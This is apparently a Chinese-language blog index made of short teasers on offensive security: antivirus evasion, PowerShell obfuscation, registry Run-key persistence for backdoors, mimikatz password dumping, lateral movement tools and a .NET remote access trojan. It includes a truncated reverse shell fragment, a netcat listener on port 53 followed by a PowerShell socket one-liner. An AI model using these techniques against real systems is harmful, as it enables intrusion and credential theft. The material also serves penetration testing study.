就在昨天kali linux的官方人员发布了kali linux的2019.4版本，我便下载了下来，给大家常常鲜。

震惊！某小白竟然利用windows绕过了windows Defender、360等AV。

最近开始忙了，所以文章可能多以tips为主，如果短的就用文字，长点的就图文。nc -lnvup 53powershell -nop -c "$s=New-Object System.Net.Sockets.Socket([System.Net.Sockets.AddressFamily]::InterNetwor......

今天介绍的是一款powershell混淆工具PyFuscation混淆后效果如下：工具有点老了，所以效果并不是很理想...下载地址：https://github.com/CBHue/PyFus

在一般用户权限下，通常是将要执行的后门程序或脚本路径填写到如下注册表的键值中HKCUSoftwareMicrosoftWindowsCurrentVersionRun，键名任意。普通权限即可运行...

invoke-mimikatz是什么？invoke-mimikatz是powersploit渗透测试套装中的一个powershell版本的mimikatz工具，用来抓取windows操作系统中的密码。

PsExec, SmbExec, WMIExec, RDP, PTH in general.

本文将从powershell特性说起，一步步介绍powershell特性，并使用特性绕过Windows Defender Reverse Shell，并在最后给出自动化工具。

RedPeanut是在.Net Core 2中开发的小型RAT及其在.Net 3.5 / 4.0中的代理。RedPeanut代码执行基于DonutCS生成的shellcode 。因此，它是混合的，尽管它是在.Net中开发的，但它并不完全依赖Assembly.Load。...

https://twitter.com/0gtweet/status/1282962201943343105